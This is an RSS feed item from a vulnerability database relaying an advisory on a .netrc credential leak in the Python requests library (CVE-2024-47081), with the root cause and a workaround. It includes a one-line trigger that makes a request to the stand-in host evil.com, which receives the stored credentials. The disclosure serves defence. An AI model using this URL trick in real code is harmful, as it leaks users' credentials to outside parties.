<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent comments.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the most 10 recent comments.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 15 Apr 2026 07:35:16 +0000</lastBuildDate>
    <item>
      <title>Netrc credential leak in PSF requests library</title>
      <link>https://vulnerability.circl.lu/comment/a5ae6fa3-504b-4d03-a153-b9f12f911f71</link>
      <description>The PSF requests library (https://github.com/psf/requests &amp; https://pypi.org/project/requests/) leaks .netrc 
credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

`  requests.get('http://example.com:@evil.com/&amp;apos;)`

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is 
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. 
CVE-2024-47081 has been reserved by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.</description>
      <content:encoded>The PSF requests library (https://github.com/psf/requests &amp; https://pypi.org/project/requests/) leaks .netrc 
credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

`  requests.get('http://example.com:@evil.com/&amp;apos;)`

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is 
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. 
CVE-2024-47081 has been reserved by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/comment/a5ae6fa3-504b-4d03-a153-b9f12f911f71</guid>
      <pubDate>Wed, 04 Jun 2025 05:03:44 +0000</pubDate>
    </item>
  </channel>
</rss>
